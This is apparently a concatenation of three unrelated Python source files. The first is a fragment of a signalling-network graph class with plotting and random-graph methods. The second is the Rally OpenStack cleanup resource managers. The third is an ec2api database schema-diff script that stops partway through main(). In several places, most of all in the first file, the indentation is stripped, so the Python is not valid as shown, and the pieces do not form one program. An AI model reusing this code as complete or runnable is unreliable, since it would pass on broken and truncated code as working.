                self.node[count[0]]['loops'] = ratio_count
                self.node[count[0]]['style'] = 'filled,bold'
        self.plot(node_attribute="loops", cmap=cmap, **kargs)
        return counting
def degree_histogram(self, show=True, normed=False):
"""Compute histogram of the node degree (and plots the histogram)
.. plot::
:include-source:
:width: 50%
from cno import XCNOGraph, cnodata
c = XCNOGraph(cnodata("PKN-ToyPB.sif"), cnodata("MD-ToyPB.csv"))
c.degree_histogram()
"""
degree = self.degree().values()
Mdegree = max(degree)
if show == True:
pylab.clf()
res = pylab.hist(degree, bins=range(0,Mdegree+1), align='left',
rwidth=0.8, normed=normed)
xlims = pylab.xlim()
ylims = pylab.ylim()
pylab.axis([0, xlims[1], ylims[0], ylims[1]*1.1])
pylab.grid()
pylab.title("Degree distribution")
return res
def plot_adjacency_matrix(self, fontsize=12, **kargs):
"""Plots adjacency matrix
:param kargs: optional arguments accepted by pylab.pcolor
From the following graph,
.. plot::
:width: 70%
from cno import XCNOGraph, cnodata
c = XCNOGraph(cnodata("PKN-ToyMMB.sif"), cnodata("MD-ToyMMB.csv"))
c.plot()
The adjacency matrix can be created as follows:
.. plot::
:width: 70%
:include-source:
from cno import XCNOGraph, cnodata
c = XCNOGraph(cnodata("PKN-ToyMMB.sif"), cnodata("MD-ToyMMB.csv"))
c.plot_adjacency_matrix()
"""
nodeNames = sorted(self.nodes())
nodeNamesY = sorted(self.nodes())
nodeNamesY.reverse()
N = len(nodeNames)
data = self.adjacency_matrix(nodelist=nodeNames)
# This is now a sparse matrix (networkx 1.9).
try:
data = data.todense()
except:
pass
pylab.pcolor(pylab.flipud(pylab.array(data)), edgecolors="k", **kargs)
pylab.axis([0, N, 0, N])
pylab.xticks([0.5+x for x in pylab.arange(N)], nodeNames, rotation=90,
fontsize=fontsize)
pylab.yticks([0.5+x for x in pylab.arange(N)], nodeNamesY, rotation=0,
fontsize=fontsize)
try:pylab.tight_layout()
except:pass
def dependency_matrix(self, fontsize=12):
r"""Return dependency matrix
* :math:`D_{i,j}` = green ; species i is an activator of species j (only positive path)
* :math:`D_{i,j}` = red ; species i is an inhibitor of species j (only negative path)
* :math:`D_{i,j}` = yellow; ambivalent (positive and negative paths connecting i and j)
* :math:`D_{i,j}` = red ; species i has no influence on j
.. plot::
:include-source:
:width: 80%
from cno import XCNOGraph, cnodata
c = XCNOGraph(cnodata("PKN-ToyPB.sif"), cnodata("MD-ToyPB.csv"))
c.dependency_matrix()
"""
nodes = sorted(self.nodes())
N = len(nodes)
data = np.zeros((len(nodes), len(nodes)))
for i,node1 in enumerate(nodes):
paths = nx.shortest_path(self, node1)
for j,node2 in enumerate(nodes):
if node1 == node2:
data[i][j] = 0
elif node2 not in paths.keys():
data[i][j] = 0
else:
path = paths[node2]
links = [self.edge[path[ii]][path[ii+1]]["link"] for ii in range(0,len(path)-1)]
if len(np.unique(links)) == 2:
data[i][j] = 1 # yellow
elif "+" in links:
data[i][j] = 2 #green
elif "-" in links:
if links.count("-") % 2 ==0:
data[i][j] = 2
else:
data[i][j] = 3 #red
nodeNames = [node.replace("_", "\_") for node in nodes]
nodeNamesY = [node.replace("_", "\_") for node in nodes]
norm = colors.Normalize(vmin=0, vmax=3)
cmap = colors.ListedColormap([[0., 0, 0], [1,1,0],[.5, 1, 0.], [1., 0, 0.]])
indices = [i for i, node in enumerate(nodes)
if "and" not in node or "+" in nodes]
pylab.clf()
pylab.pcolor(pylab.flipud(data[indices][:,indices]), edgecolors="w",
cmap=cmap, norm=norm);
N = len(indices)
nodeNames = np.array(nodeNames)[indices]
nodeNamesY = np.array(nodeNamesY)[indices[::-1]]
X = [0.5+x for x in range(0, len(nodeNames))]
pylab.xticks(X, nodeNames, rotation=90, fontsize=fontsize)
pylab.yticks(X, nodeNamesY, fontsize=fontsize)
pylab.xlim([0, len(X)])
pylab.ylim([0, len(X)])
def random_cnograph(self, nStimuli=5, nSignals=14, fraction_activation=0.9, nTranscript=5,
nExtraNode=10):
"""
Create the nodes first (stimuli, signals, transcripts, extra nodes). Them
add edges such that the ratio of activation/inhibition is fixed.
no self loop
"""
assert fraction_activation >=0 and fraction_activation<=1
assert nStimuli>=1
assert nExtraNode >= 1
assert nSignals >= 1
assert nTranscript >=1 and nTranscript <= nSignals
self.clear()
# add stimuli
stimuli = ['L' + str(i) for i in range(1, nStimuli+1)]
self.add_nodes_from(stimuli)
self._stimuli = stimuli[:]
signals = ['S' + str(i) for i in range(1, nSignals+1)]
self.add_nodes_from(signals)
self._signals = signals[:]
self.add_nodes_from(['N'+str(i) for i in range(1,nExtraNode+1)])
nodes = self.nodes()
# select the transcript:
transcripts = [x for x in self.nodes() if x not in self.stimuli]
transcripts = transcripts[0:nTranscript]
def get_link():
link = np.random.uniform()
if link < fraction_activation:
return "+"
else:
return "-"
count = 0
N = len(self.nodes())
while nx.is_connected(self.to_undirected()) is False and count < N * 3:
np.random.shuffle(nodes)
n1 = nodes[0]
n2 = nodes[1]
if n2 in self.stimuli or n1 in transcripts:
continue
# ignore self loop
if n1 == n2:
continue
self.add_edge(n1, n2, link=get_link())
count += 1
# some nodes (non-stimuli/non-signals) may have no input connections, which is
# not wanted.
tofix = [x for x in self.nodes() if self.in_degree()[x] == 0 and x.startswith('N')]
for nodetofix in tofix:
nodes = [node for node in self.nodes() if node !=tofix]
np.random.shuffle(nodes)
self.add_edge(nodes[0], nodetofix, link=get_link())
# make sure the ligands are connected:
for stimulus in self._stimuli:
if len(self.successors(stimulus)) == 0:
print("fixing stimulus %s" % stimulus)
nodes = [node for node in self.nodes() if node not in self._stimuli]
np.random.shuffle(nodes)
self.add_edge(stimulus, nodes[0])
def random_poisson_graph(self, n=10, mu=2.5, ratio=0.9,
remove_unconnected=True, Nsignals=5, Nstimuli=5,
remove_self_loops=True, maxtrials=50):
"""Experimental random graph creation"""
count = 0
while count < maxtrials:
self._random_poisson_graph(n, mu, ratio=ratio,
remove_unconnected=remove_unconnected,
remove_self_loops=remove_self_loops)
if nx.is_connected(self.to_undirected()):
count = maxtrials + 1
else:
count += 1
    def _random_poisson_graph(self, n=10, mu=2.5, ratio=0.9,
            remove_unconnected=True,
            remove_self_loops=True, Nsignals=5, Nstimuli=5):
        """Build one random graph with Poisson-distributed expected degrees.

        :param int n: number of nodes
        :param float mu: mean of the Poisson degree distribution
        :param float ratio: fraction of edges marked as activations ("+")
        :param bool remove_unconnected: if False, keep isolated nodes
        :param bool remove_self_loops: drop self loops after edge creation
        :param int Nsignals: maximum number of sink nodes used as signals
        :param int Nstimuli: maximum number of source nodes used as stimuli
        """
        from scipy.stats import poisson
        # one expected degree per node, drawn from Poisson(mu)
        z = [poisson.rvs(mu) for i in range(0,n)]
        G = nx.expected_degree_graph(z)
        self.clear()
        # converts to strings
        edges = [(str(e[0]), str(e[1])) for e in G.edges()]
        assert ratio >= 0
        assert ratio <= 1
        # first N edges become activations, the rest inhibitions
        N = int(len(edges)* ratio)
        edges_pos = edges[0:N]
        edges_neg = edges[N:]
        self.add_edges_from(edges_pos, link="+")
        self.add_edges_from(edges_neg, link="-")
        # remove self loop first
        if remove_self_loops:
            self.remove_self_loops()
        if remove_unconnected == False:
            # add all nodes (even though they may be unconnected)
            self.add_nodes_from(G.nodes())
        # rank 0 nodes are sources (stimuli); last rank nodes are sinks (signals)
        ranks = self.get_same_rank()
        sources = ranks[0]
        sinks = ranks[max(ranks.keys())]
        Nstim = min(len(sources), Nstimuli)
        Nsignals = min(len(sinks), Nsignals)
        self._stimuli = sources[0:Nstim]
        self._signals = sinks[0:Nsignals]
        self.set_default_node_attributes()
| |
# Copyright 2014: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from boto import exception as boto_exception
from neutronclient.common import exceptions as neutron_exceptions
from saharaclient.api import base as saharaclient_base
from rally.common import log as logging
from rally.plugins.openstack.context.cleanup import base
from rally.plugins.openstack.scenarios.keystone import utils as kutils
from rally.plugins.openstack.wrappers import keystone as keystone_wrapper
LOG = logging.getLogger(__name__)
def get_order(start):
    """Return an iterator yielding 99 sequential order numbers from *start*."""
    return (number for number in range(start, start + 99))
class SynchronizedDeletion(object):
    """Mixin for resources whose delete call blocks until completion."""
    def is_deleted(self):
        """Deletion is synchronous, so once delete() returns it is done."""
        return True
class QuotaMixin(SynchronizedDeletion):
    """Mixin for per-tenant quota "resources" keyed by the tenant uuid."""
    def id(self):
        # the raw resource is the tenant uuid itself
        return self.raw_resource
    def delete(self):
        # resets/deletes the quota set of this tenant
        self._manager().delete(self.raw_resource)
    def list(self):
        # exactly one quota pseudo-resource per tenant, if a tenant is bound
        return [self.tenant_uuid] if self.tenant_uuid else []
# HEAT
@base.resource("heat", "stacks", order=100, tenant_resource=True)
class HeatStack(base.ResourceManager):
    """Cleanup manager for Heat stacks."""
    pass
# NOVA
_nova_order = get_order(200)
@base.resource("nova", "servers", order=next(_nova_order))
class NovaServer(base.ResourceManager):
    """Cleanup manager for Nova servers."""
    def delete(self):
        # a locked server cannot be deleted, so release the lock first;
        # the attribute name is not a valid identifier, hence getattr
        if getattr(self.raw_resource, "OS-EXT-STS:locked", False):
            self.raw_resource.unlock()
        super(NovaServer, self).delete()
@base.resource("nova", "keypairs", order=next(_nova_order))
class NovaKeypair(SynchronizedDeletion, base.ResourceManager):
    """Cleanup manager for Nova keypairs."""
    pass
@base.resource("nova", "security_groups", order=next(_nova_order))
class NovaSecurityGroup(SynchronizedDeletion, base.ResourceManager):
    """Cleanup manager for Nova security groups."""
    def list(self):
        # never delete the built-in "default" security group
        return filter(lambda x: x.name != "default",
                      super(NovaSecurityGroup, self).list())
@base.resource("nova", "quotas", order=next(_nova_order),
               admin_required=True, tenant_resource=True)
class NovaQuotas(QuotaMixin, base.ResourceManager):
    """Cleanup manager for per-tenant Nova quotas."""
    pass
@base.resource("nova", "floating_ips_bulk", order=next(_nova_order),
               admin_required=True)
class NovaFloatingIpsBulk(SynchronizedDeletion, base.ResourceManager):
    """Cleanup manager for bulk-created floating IP ranges."""
    def id(self):
        # bulk floating IPs have no uuid; the address is the identifier
        return self.raw_resource.address
    def list(self):
        # only touch addresses belonging to pools created by rally
        return [floating_ip for floating_ip in self._manager().list()
                if floating_ip.pool.startswith("rally_fip_pool_")]
# EC2
_ec2_order = get_order(250)
class EC2Mixin(object):
    """Mixin resolving the EC2 (boto) client from the user credential."""
    def _manager(self):
        # EC2 resources are always accessed with user (not admin) credentials
        return getattr(self.user, self._service)()
@base.resource("ec2", "servers", order=next(_ec2_order))
class EC2Server(EC2Mixin, base.ResourceManager):
    """Cleanup manager for EC2 instances."""
    def is_deleted(self):
        """True once the instance is gone or every match is 'terminated'."""
        try:
            instances = self._manager().get_only_instances(
                instance_ids=[self.id()])
        except boto_exception.EC2ResponseError as e:
            # NOTE(wtakase): Nova EC2 API returns 'InvalidInstanceID.NotFound'
            #                if instance not found. In this case, we consider
            #                instance has already been deleted.
            return getattr(e, "error_code") == "InvalidInstanceID.NotFound"
        # NOTE(wtakase): After instance deletion, instance can be 'terminated'
        #                state. If all instance states are 'terminated', this
        #                returns True. And if get_only_instaces() returns empty
        #                list, this also returns True because we consider
        #                instance has already been deleted.
        return all(map(lambda i: i.state == "terminated", instances))
    def delete(self):
        # in EC2 terminology, terminating an instance deletes it
        self._manager().terminate_instances(instance_ids=[self.id()])
    def list(self):
        return self._manager().get_only_instances()
# NEUTRON
_neutron_order = get_order(300)
@base.resource(service=None, resource=None, admin_required=True)
class NeutronMixin(SynchronizedDeletion, base.ResourceManager):
    # Neutron has the best client ever, so we need to override everything
    def _manager(self):
        # fall back to the user client when no admin client is required
        client = self._admin_required and self.admin or self.user
        return getattr(client, self._service)()
    def id(self):
        # neutron resources are plain dicts, not objects
        return self.raw_resource["id"]
    def delete(self):
        # e.g. delete_port, delete_network, ... derived from the resource name
        delete_method = getattr(self._manager(), "delete_%s" % self._resource)
        delete_method(self.id())
    def list(self):
        # e.g. list_ports({"tenant_id": ...})["ports"]; keep this tenant only
        resources = self._resource + "s"
        list_method = getattr(self._manager(), "list_%s" % resources)
        return filter(lambda r: r["tenant_id"] == self.tenant_uuid,
                      list_method({"tenant_id": self.tenant_uuid})[resources])
@base.resource("neutron", "port", order=next(_neutron_order),
               tenant_resource=True)
class NeutronPort(NeutronMixin):
    """Cleanup manager for Neutron ports."""
    def delete(self):
        # a router interface port cannot be deleted directly; it must be
        # detached from its router instead
        if self.raw_resource["device_owner"] == "network:router_interface":
            self._manager().remove_interface_router(
                self.raw_resource["device_id"],
                {"port_id": self.raw_resource["id"]})
        else:
            try:
                self._manager().delete_port(self.id())
            except neutron_exceptions.PortNotFoundClient:
                # Port can be already auto-deleted, skip silently
                LOG.debug("Port %s was not deleted. Skip silently because "
                          "port can be already auto-deleted."
                          % self.id())
@base.resource("neutron", "router", order=next(_neutron_order),
               tenant_resource=True)
class NeutronRouter(NeutronMixin):
    """Cleanup manager for Neutron routers."""
    pass
@base.resource("neutron", "pool", order=next(_neutron_order),
               tenant_resource=True)
class NeutronV1Pool(NeutronMixin):
    """Cleanup manager for Neutron LBaaS v1 pools."""
    pass
@base.resource("neutron", "subnet", order=next(_neutron_order),
               tenant_resource=True)
class NeutronSubnet(NeutronMixin):
    """Cleanup manager for Neutron subnets."""
    pass
@base.resource("neutron", "network", order=next(_neutron_order),
               tenant_resource=True)
class NeutronNetwork(NeutronMixin):
    """Cleanup manager for Neutron networks."""
    pass
@base.resource("neutron", "quota", order=next(_neutron_order),
               admin_required=True, tenant_resource=True)
class NeutronQuota(QuotaMixin, NeutronMixin):
    """Cleanup manager for per-tenant Neutron quotas."""
    def delete(self):
        # quotas are reset by tenant uuid, not by resource id
        self._manager().delete_quota(self.tenant_uuid)
# CINDER
_cinder_order = get_order(400)
@base.resource("cinder", "backups", order=next(_cinder_order),
               tenant_resource=True)
class CinderVolumeBackup(base.ResourceManager):
    """Cleanup manager for Cinder volume backups."""
    pass
@base.resource("cinder", "volume_snapshots", order=next(_cinder_order),
               tenant_resource=True)
class CinderVolumeSnapshot(base.ResourceManager):
    """Cleanup manager for Cinder volume snapshots."""
    pass
@base.resource("cinder", "transfers", order=next(_cinder_order),
               tenant_resource=True)
class CinderVolumeTransfer(base.ResourceManager):
    """Cleanup manager for Cinder volume transfers."""
    pass
@base.resource("cinder", "volumes", order=next(_cinder_order),
               tenant_resource=True)
class CinderVolume(base.ResourceManager):
    """Cleanup manager for Cinder volumes."""
    pass
@base.resource("cinder", "quotas", order=next(_cinder_order),
               admin_required=True, tenant_resource=True)
class CinderQuotas(QuotaMixin, base.ResourceManager):
    """Cleanup manager for per-tenant Cinder quotas."""
    pass
# MANILA
_manila_order = get_order(450)
@base.resource("manila", "shares", order=next(_manila_order),
               tenant_resource=True)
class ManilaShare(base.ResourceManager):
    """Cleanup manager for Manila shares."""
    pass
@base.resource("manila", "share_networks", order=next(_manila_order),
               tenant_resource=True)
class ManilaShareNetwork(base.ResourceManager):
    """Cleanup manager for Manila share networks."""
    pass
@base.resource("manila", "security_services", order=next(_manila_order),
               tenant_resource=True)
class ManilaSecurityService(base.ResourceManager):
    """Cleanup manager for Manila security services."""
    pass
# GLANCE
@base.resource("glance", "images", order=500, tenant_resource=True)
class GlanceImage(base.ResourceManager):
    """Cleanup manager for Glance images."""
    def list(self):
        # only images owned by this tenant
        return self._manager().list(owner=self.tenant_uuid)
# SAHARA
_sahara_order = get_order(600)
@base.resource("sahara", "job_executions", order=next(_sahara_order),
               tenant_resource=True)
class SaharaJobExecution(SynchronizedDeletion, base.ResourceManager):
    """Cleanup manager for Sahara job executions."""
    pass
@base.resource("sahara", "jobs", order=next(_sahara_order),
               tenant_resource=True)
class SaharaJob(SynchronizedDeletion, base.ResourceManager):
    """Cleanup manager for Sahara jobs."""
    pass
@base.resource("sahara", "job_binary_internals", order=next(_sahara_order),
               tenant_resource=True)
class SaharaJobBinaryInternals(SynchronizedDeletion, base.ResourceManager):
    """Cleanup manager for Sahara internal job binaries."""
    pass
@base.resource("sahara", "job_binaries", order=next(_sahara_order),
               tenant_resource=True)
class SaharaJobBinary(SynchronizedDeletion, base.ResourceManager):
    """Cleanup manager for Sahara job binaries."""
    pass
@base.resource("sahara", "data_sources", order=next(_sahara_order),
               tenant_resource=True)
class SaharaDataSource(SynchronizedDeletion, base.ResourceManager):
    """Cleanup manager for Sahara data sources."""
    pass
@base.resource("sahara", "clusters", order=next(_sahara_order),
               tenant_resource=True)
class SaharaCluster(base.ResourceManager):
    """Cleanup manager for Sahara clusters."""
    # Need special treatment for Sahara Cluster because of the way the
    # exceptions are described in:
    # https://github.com/openstack/python-saharaclient/blob/master/
    # saharaclient/api/base.py#L145
    def is_deleted(self):
        """Probe the cluster: a 404 from the API means it is gone."""
        try:
            self._manager().get(self.id())
            return False
        except saharaclient_base.APIException as e:
            return e.error_code == 404
@base.resource("sahara", "cluster_templates", order=next(_sahara_order),
               tenant_resource=True)
class SaharaClusterTemplate(SynchronizedDeletion, base.ResourceManager):
    """Cleanup manager for Sahara cluster templates."""
    pass
@base.resource("sahara", "node_group_templates", order=next(_sahara_order),
               tenant_resource=True)
class SaharaNodeGroup(SynchronizedDeletion, base.ResourceManager):
    """Cleanup manager for Sahara node group templates."""
    pass
# CEILOMETER
@base.resource("ceilometer", "alarms", order=700, tenant_resource=True)
class CeilometerAlarms(SynchronizedDeletion, base.ResourceManager):
    """Cleanup manager for Ceilometer alarms."""
    def id(self):
        # alarms expose alarm_id instead of id
        return self.raw_resource.alarm_id
    def list(self):
        # only alarms belonging to this tenant (project)
        query = [{
            "field": "project_id",
            "op": "eq",
            "value": self.tenant_uuid
        }]
        return self._manager().list(q=query)
# ZAQAR
@base.resource("zaqar", "queues", order=800)
class ZaqarQueues(SynchronizedDeletion, base.ResourceManager):
    """Cleanup manager for Zaqar queues."""
    def list(self):
        # the zaqar client exposes queues directly on the user client
        return self.user.zaqar().queues()
# DESIGNATE
_designate_order = get_order(900)
@base.resource("designate", "domains", order=next(_designate_order))
class Designate(SynchronizedDeletion, base.ResourceManager):
    """Cleanup manager for Designate domains."""
    pass
@base.resource("designate", "servers", order=next(_designate_order),
               admin_required=True, perform_for_admin_only=True)
class DesignateServer(SynchronizedDeletion, base.ResourceManager):
    """Cleanup manager for Designate servers (admin only)."""
    pass
# SWIFT
_swift_order = get_order(1000)
class SwiftMixin(SynchronizedDeletion, base.ResourceManager):
    """Shared plumbing for Swift containers and objects."""
    def _manager(self):
        # fall back to the user client when no admin client is required
        client = self._admin_required and self.admin or self.user
        return getattr(client, self._service)()
    def id(self):
        # raw_resource is [container] or [container, object]
        return self.raw_resource
    def delete(self):
        delete_method = getattr(self._manager(), "delete_%s" % self._resource)
        # NOTE(weiwu): *self.raw_resource is required because for deleting
        # container we are passing only container name, to delete object we
        # should pass as first argument container and second is object name.
        delete_method(*self.raw_resource)
@base.resource("swift", "object", order=next(_swift_order),
               tenant_resource=True)
class SwiftObject(SwiftMixin):
    """Cleanup manager for Swift objects."""
    def list(self):
        # get_account()/get_container() return (headers, listing); each raw
        # resource is a [container_name, object_name] pair so SwiftMixin's
        # delete can unpack it as positional arguments
        account_containers = self._manager().get_account(full_listing=True)[1]
        return [
            [container["name"], swift_object["name"]]
            for container in account_containers
            for swift_object in self._manager().get_container(
                container["name"], full_listing=True)[1]
        ]
@base.resource("swift", "container", order=next(_swift_order),
               tenant_resource=True)
class SwiftContainer(SwiftMixin):
    """Cleanup manager for Swift containers."""
    def list(self):
        # wrap each name in a list so SwiftMixin.delete can unpack it
        containers = self._manager().get_account(full_listing=True)[1]
        return [[con["name"]] for con in containers]
# MISTRAL
@base.resource("mistral", "workbooks", order=1100, tenant_resource=True)
class MistralWorkbooks(SynchronizedDeletion, base.ResourceManager):
    """Cleanup manager for Mistral workbooks."""
    def delete(self):
        # workbooks are deleted by name, not by id
        self._manager().delete(self.raw_resource.name)
# MURANO
_murano_order = get_order(1200)
@base.resource("murano", "environments", tenant_resource=True,
               order=next(_murano_order))
class MuranoEnvironments(base.ResourceManager):
    """Cleanup manager for Murano environments."""
    pass
@base.resource("murano", "packages", tenant_resource=True,
               order=next(_murano_order))
class MuranoPackages(base.ResourceManager):
    """Cleanup manager for Murano packages."""
    def list(self):
        # never remove the built-in "Core library" package
        return filter(lambda x: x.name != "Core library",
                      super(MuranoPackages, self).list())
# KEYSTONE
_keystone_order = get_order(9000)
class KeystoneMixin(SynchronizedDeletion):
    """Shared plumbing for Keystone resources (cleaned up last)."""
    def _manager(self):
        # always use the admin client; the wrapper smooths over v2/v3
        # keystone API differences
        return keystone_wrapper.wrap(getattr(self.admin, self._service)())
    def delete(self):
        delete_method = getattr(self._manager(), "delete_%s" % self._resource)
        delete_method(self.id())
    def list(self):
        # TODO(boris-42): We should use such stuff in all list commands.
        resources = self._resource + "s"
        list_method = getattr(self._manager(), "list_%s" % resources)
        # only rally-created (temporary) resources are cleaned up
        return filter(kutils.is_temporary, list_method())
@base.resource("keystone", "user", order=next(_keystone_order),
               admin_required=True, perform_for_admin_only=True)
class KeystoneUser(KeystoneMixin, base.ResourceManager):
    """Cleanup manager for temporary Keystone users."""
    pass
@base.resource("keystone", "project", order=next(_keystone_order),
               admin_required=True, perform_for_admin_only=True)
class KeystoneProject(KeystoneMixin, base.ResourceManager):
    """Cleanup manager for temporary Keystone projects."""
    pass
@base.resource("keystone", "service", order=next(_keystone_order),
               admin_required=True, perform_for_admin_only=True)
class KeystoneService(KeystoneMixin, base.ResourceManager):
    """Cleanup manager for temporary Keystone services."""
    pass
@base.resource("keystone", "role", order=next(_keystone_order),
               admin_required=True, perform_for_admin_only=True)
class KeystoneRole(KeystoneMixin, base.ResourceManager):
    """Cleanup manager for temporary Keystone roles."""
    pass
@base.resource("keystone", "ec2", tenant_resource=True,
               order=next(_keystone_order))
class KeystoneEc2(SynchronizedDeletion, base.ResourceManager):
    """Cleanup manager for EC2 credentials stored in Keystone."""
    def list(self):
        # NOTE(review): raw_resource is passed as the list() argument --
        # presumably the user whose ec2 credentials are enumerated; confirm
        return self._manager().list(self.raw_resource)
| |
#!/usr/bin/env python
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Utility for diff'ing two versions of the DB schema.
Each release cycle the plan is to compact all of the migrations from that
release into a single file. This is a manual and, unfortunately, error-prone
process. To ensure that the schema doesn't change, this tool can be used to
diff the compacted DB schema to the original, uncompacted form.
The schema versions are specified by providing a git ref (a branch name or
commit hash) and a SQLAlchemy-Migrate version number:
Run like:
./tools/db/schema_diff.py mysql master:latest my_branch:82
"""
import datetime
import glob
import os
import subprocess
import sys
### Dump
def dump_db(db_driver, db_name, migration_version, dump_filename):
    """Create *db_name*, migrate it to *migration_version*, and dump its
    schema to *dump_filename*; the scratch database is always dropped.
    """
    db_driver.create(db_name)
    try:
        migrate(db_driver, db_name, migration_version)
        db_driver.dump(db_name, dump_filename)
    finally:
        # never let the scratch database outlive the dump
        db_driver.drop(db_name)
### Diff
def diff_files(filename1, filename2):
    """Show a paginated unified diff of two files, colorized when possible."""
    stages = ['diff -U 3 %(filename1)s %(filename2)s' % locals()]
    # Use colordiff if available
    if subprocess.call(['which', 'colordiff']) == 0:
        stages.append('colordiff')
    stages.append('less -R')
    # run the whole pipeline through the shell
    subprocess.check_call(' | '.join(stages), shell=True)
### Database
class MySQL(object):
    """Create/drop/dump scratch MySQL databases via the mysqladmin and
    mysqldump command-line tools (as root, no password)."""
    def create(self, name):
        subprocess.check_call(['mysqladmin', '-u', 'root', 'create', name])
    def drop(self, name):
        # -f: do not ask for confirmation
        subprocess.check_call(['mysqladmin', '-f', '-u', 'root', 'drop', name])
    def dump(self, name, dump_filename):
        # shell redirection writes the schema dump to the target file
        subprocess.check_call(
            'mysqldump -u root %(name)s > %(dump_filename)s' % locals(),
            shell=True)
    def url(self, name):
        """SQLAlchemy URL for the named database."""
        return 'mysql://root@localhost/%s' % name
class Postgres(object):
    """Create/drop/dump scratch PostgreSQL databases via the createdb,
    dropdb and pg_dump command-line tools."""
    def create(self, name):
        subprocess.check_call(['createdb', name])
    def drop(self, name):
        subprocess.check_call(['dropdb', name])
    def dump(self, name, dump_filename):
        # shell redirection writes the schema dump to the target file
        subprocess.check_call(
            'pg_dump %(name)s > %(dump_filename)s' % locals(),
            shell=True)
    def url(self, name):
        """SQLAlchemy URL for the named database."""
        return 'postgres://localhost/%s' % name
def _get_db_driver_class(db_type):
if db_type == "mysql":
return MySQL
elif db_type == "postgres":
return Postgres
else:
raise Exception(_("database %s not supported") % db_type)
### Migrate
MIGRATE_REPO = os.path.join(os.getcwd(), "ec2api/db/sqlalchemy/migrate_repo")
def migrate(db_driver, db_name, migration_version):
    """Bring *db_name* under version control and upgrade it.

    :param migration_version: target version number, or 'latest' to apply
        every migration in the repository
    """
    earliest_version = _migrate_get_earliest_version()
    # NOTE(sirp): sqlalchemy-migrate currently cannot handle the skipping of
    # migration numbers.
    _migrate_cmd(
        db_driver, db_name, 'version_control', str(earliest_version - 1))
    upgrade_cmd = ['upgrade']
    if migration_version != 'latest':
        upgrade_cmd.append(str(migration_version))
    _migrate_cmd(db_driver, db_name, *upgrade_cmd)
def _migrate_cmd(db_driver, db_name, *cmd):
    """Run a sqlalchemy-migrate manage.py command against *db_name*."""
    manage_py = os.path.join(MIGRATE_REPO, 'manage.py')
    # assemble: python manage.py <cmd...> --repository=... --url=...
    args = ['python', manage_py] + list(cmd) + [
        '--repository=%s' % MIGRATE_REPO,
        '--url=%s' % db_driver.url(db_name),
    ]
    subprocess.check_call(args)
def _migrate_get_earliest_version():
    """Return the lowest migration version present in the versions directory.

    Version scripts are named like '001_description.py'; the 3-character
    numeric prefix is the migration version.
    """
    versions_glob = os.path.join(MIGRATE_REPO, 'versions', '???_*.py')
    versions = []
    for path in glob.iglob(versions_glob):
        filename = os.path.basename(path)
        prefix = filename.split('_', 1)[0]
        try:
            version = int(prefix)
        except ValueError:
            # BUG FIX: the original fell through (pass) and then appended the
            # previous iteration's version -- or raised NameError if the
            # first file had a non-numeric prefix. Skip such files instead.
            continue
        versions.append(version)
    versions.sort()
    return versions[0]
### Git
def git_current_branch_name():
    """Return the short name of the branch currently checked out."""
    # 'git symbolic-ref HEAD' yields e.g. 'refs/heads/master'
    return git_symbolic_ref('HEAD', quiet=True).replace('refs/heads/', '')
def git_symbolic_ref(ref, quiet=False):
    """Return the full ref name *ref* points at (e.g. 'refs/heads/master').

    :param quiet: pass -q to git to suppress errors (e.g. detached HEAD)
    """
    args = ['git', 'symbolic-ref', ref]
    if quiet:
        args.append('-q')
    proc = subprocess.Popen(args, stdout=subprocess.PIPE)
    stdout, stderr = proc.communicate()
    # strip the trailing newline from git's output
    return stdout.strip()
def git_checkout(branch_name):
    """Check out *branch_name* (or any git ref)."""
    subprocess.check_call(['git', 'checkout', branch_name])
def git_has_uncommited_changes():
    """True if the working tree differs from HEAD (uncommitted changes)."""
    return subprocess.call(['git', 'diff', '--quiet', '--exit-code']) == 1
### Command
def die(msg):
    """Print an error to stderr and exit with status 1."""
    print >> sys.stderr, "ERROR: %s" % msg
    sys.exit(1)
def usage(msg=None):
    """Print usage (and an optional error) to stderr and exit with status 1."""
    if msg:
        print >> sys.stderr, "ERROR: %s" % msg
    prog = "schema_diff.py"
    args = ["<mysql|postgres>", "<orig-branch:orig-version>",
            "<new-branch:new-version>"]
    print >> sys.stderr, "usage: %s %s" % (prog, ' '.join(args))
    sys.exit(1)
def parse_options():
    """Parse command-line arguments.

    :returns: tuple (db_type, orig_branch, orig_version, new_branch,
        new_version)

    Exits with a usage message when an argument is missing or malformed.
    """
    try:
        db_type = sys.argv[1]
    except IndexError:
        usage("must specify DB type")
    try:
        orig_branch, orig_version = sys.argv[2].split(':')
    except (IndexError, ValueError):
        # BUG FIX: a malformed argument without ':' raises ValueError from
        # the tuple unpacking, which the original did not catch and crashed
        # with a traceback instead of the usage message
        usage('original branch and version required (e.g. master:82)')
    try:
        new_branch, new_version = sys.argv[3].split(':')
    except (IndexError, ValueError):
        usage('new branch and version required (e.g. master:82)')
    return db_type, orig_branch, orig_version, new_branch, new_version
def main():
    """Dump both schema versions and show their diff.

    Checks out each requested branch in turn, dumps the migrated schema of
    each into a temp file, diffs the two dumps, and always restores the
    user's original branch and removes the dump files.
    """
    # timestamped names avoid collisions with existing databases/files
    timestamp = datetime.datetime.utcnow().strftime("%Y%m%d_%H%M%S")
    ORIG_DB = 'orig_db_%s' % timestamp
    NEW_DB = 'new_db_%s' % timestamp
    ORIG_DUMP = ORIG_DB + ".dump"
    NEW_DUMP = NEW_DB + ".dump"
    options = parse_options()
    db_type, orig_branch, orig_version, new_branch, new_version = options
    # Since we're going to be switching branches, ensure user doesn't have any
    # uncommited changes
    if git_has_uncommited_changes():
        die("You have uncommited changes. Please commit them before running "
            "this command.")
    db_driver = _get_db_driver_class(db_type)()
    users_branch = git_current_branch_name()
    git_checkout(orig_branch)
    try:
        # Dump Original Schema
        dump_db(db_driver, ORIG_DB, orig_version, ORIG_DUMP)
        # Dump New Schema
        git_checkout(new_branch)
